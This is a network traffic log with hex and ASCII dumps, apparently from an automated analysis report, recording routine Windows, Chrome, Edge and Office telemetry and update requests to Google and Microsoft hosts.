2024-11-11 23:06:14 UTC	928	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 910 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=519=Q3V6gjI0oUlAeqroIEhhZSikSv2ekJ_ctBtuTtDRKpIoLdG89zUwiL8Luy7aI6efjcHdM3GShjM8c3HKT4R1Jm9ysRl-JxP3Ch4jmbtLBAtWxiOmUfTWTty6uqrPyUJGe3pkua1nRAmG5H_Ssh7oIOOxi0Y5PH137GnHWovOLmj_FLGaRLvAJJHL
2024-11-11 23:06:14 UTC	910	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 31 33 36 36 33 37 32 34 33 31 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1731366372431",null,null,null,
2024-11-11 23:06:15 UTC	950	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=519=BG53jgV3_8pokby7phG5ShqvKli1u5-OBbzmzN02jfXCaUa_ucTRcWmubDqqDbwH5gHYFIFwFEgcpFGMWF0T4n1tSeMwFdafCjcfK3X0Tnc4TbJFhvbhMl_MtCh7OLtj9JM27H3kJyL3TuQ2G_yX_tUNZd86W4hYJKih4FCjs-3SdLCNwiCHwnn9KHWa5kO_; expires=Tue, 13-May-2025 23:06:14 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Mon, 11 Nov 2024 23:06:14 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Mon, 11 Nov 2024 23:06:14 GMT Connection: close Transfer-Encoding: chunked
2024-11-11 23:06:15 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-11-11 23:06:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49739	94.245.104.56	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:19 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:19 UTC	584	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Mon, 11 Nov 2024 23:06:19 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=44bf434ab6f7c0830d46be44706778b10a42312d4a4ae9076c4e359fcb4c5775;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=44bf434ab6f7c0830d46be44706778b10a42312d4a4ae9076c4e359fcb4c5775;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.5	49743	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:21 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:21 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:21 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Sat, 09 Nov 2024 18:56:51 GMT ETag: "0x8DD00F04568BDCF" x-ms-request-id: a2ad2bd1-f01e-0096-27d5-3310ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230621Z-174f7845968j6t2phC1EWRcfe800000005rg00000000davr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:21 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-11 23:06:21 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-11 23:06:21 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-11 23:06:21 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-11 23:06:21 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-11 23:06:21 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-11 23:06:21 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-11 23:06:21 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-11 23:06:21 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-11 23:06:21 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49732	20.109.210.53	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:21 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KM3zyh56Yr5CFe3&MD=OeGs9yZU HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-11 23:06:21 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: ce2a25d9-64ea-4a87-9f7f-f34f04edd7b2 MS-RequestId: 157d858f-bd4f-482b-8b82-b8353c168036 MS-CV: FZ9JbJKniky9k4ir.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 11 Nov 2024 23:06:20 GMT Connection: close Content-Length: 24490
2024-11-11 23:06:21 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-11 23:06:21 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.5	49755	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:22 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:22 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:22 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 45cb36d2-601e-0070-3cd5-33a0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230622Z-174f7845968qj8jrhC1EWRh41s00000005e000000000nzhp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:22 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.5	49753	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:22 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:22 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:22 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 0eb2a1cd-301e-0020-44d5-336299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230622Z-174f7845968j9dchhC1EWRfe7400000005g0000000004uqs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
